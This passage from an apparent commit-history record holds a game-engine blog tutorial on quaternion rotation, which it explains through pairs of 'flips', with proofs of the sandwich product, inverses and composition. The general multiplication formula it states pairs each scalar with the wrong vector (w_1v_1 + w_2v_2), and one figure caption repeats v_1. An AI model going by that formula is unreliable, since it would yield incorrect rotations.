then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}], rotate stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotate stem:[270^{\\circ}] degree but in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represents the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\\vec{a}] first and then stem:[\\vec{b}]. Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and vector stem:[\\vec{v}], we are ready to calculate the result of the flip stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axis of flip stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}].If you are not sure what\u2019s going on here, go back \u201cFlip Composition\u201d and read the proof)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called identity quaternion, means no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternion, the idea of inversed quaternion is if you apply a rotation, then apply its inverse, the result should be no rotation at all. And it is the same if you apply an inversed rotation then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flip. You can try extend this proof to general unit quaternion. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to previous result of flipping vector stem:[{q_v'}{q_a}={q_a}{q_v}]. Apply inverse flip of q_a on both side, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is how the \u201csandwich\u201d multiplication form comes from, but only in the form of flip. We will prove that our result holds the same for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we fully explained how to rotate a vector using quaternion.\n\n=== Rotation Composition\n\nGiven rotation stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as apply the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later.\n\nWhat does it really mean to combine 2 rotations, can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually do that.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_2}=0], we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find out the other two axes: rotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flip stem:[q_a] and stem:[q_b], which tells the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, Blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_1}], stem:[\\vec{c}] is perpendicular to that plane. \nOrange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}], the result rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of quaternion stem:[q=(x,y,z,w)], the vector form of quaternion stem:[q=(\\vec{v},w)], unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about negation of quaternion stem:[\u2013q], and its double cover property; the inverse of quaternion stem:[q^{-1}] and identity quaternion stem:[I=(\\vec{0},1)].\n\nWe use quaternion to represent flip stem:[q_a=(\\vec{a},0)], and derive the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotation gets composed by stem:[q={q_2}{q_1}].\n\nWe slightly touched quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternion. It is a bit calculation heavy and is more for fun. Feel free to skip.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is if we define flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can proof what general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we choose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}vec{v_2}))\n\\end{align*}\n++++ \nwhich is the definition of quaternion multiplication of stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})].\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff1ac39f9103eaac3daaed44cd7758fbc9a93fde","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. I will start with a special rotation operation: flip, and use that to visualize quaternion in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engine versus rotation matrix and Euler angle.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nQuaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expected from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)] 